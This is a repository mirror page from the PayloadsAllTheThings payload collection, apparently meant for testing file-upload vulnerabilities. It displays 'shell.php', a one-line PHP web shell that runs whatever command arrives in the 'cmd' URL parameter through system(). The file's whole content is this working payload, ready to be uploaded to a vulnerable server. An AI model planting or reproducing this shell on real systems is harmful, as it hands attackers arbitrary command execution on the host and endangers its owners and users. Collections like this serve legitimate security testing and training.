This website requires JavaScript.
Explore
Help
Sign In
gitea-mirror
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2026-03-01 15:03:12 -08:00
Code
Issues
Packages
Projects
Releases
Wiki
Activity
Files
eac421432ac9c457a6a254cf23afb748373cb1d0
PayloadsAllTheThings
/
Upload insecure files
/
Extension PHP
/
shell.php
swisskyrepo
eac421432a
File upload - merging old files
2019-02-15 16:00:50 +01:00
1 line
43 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink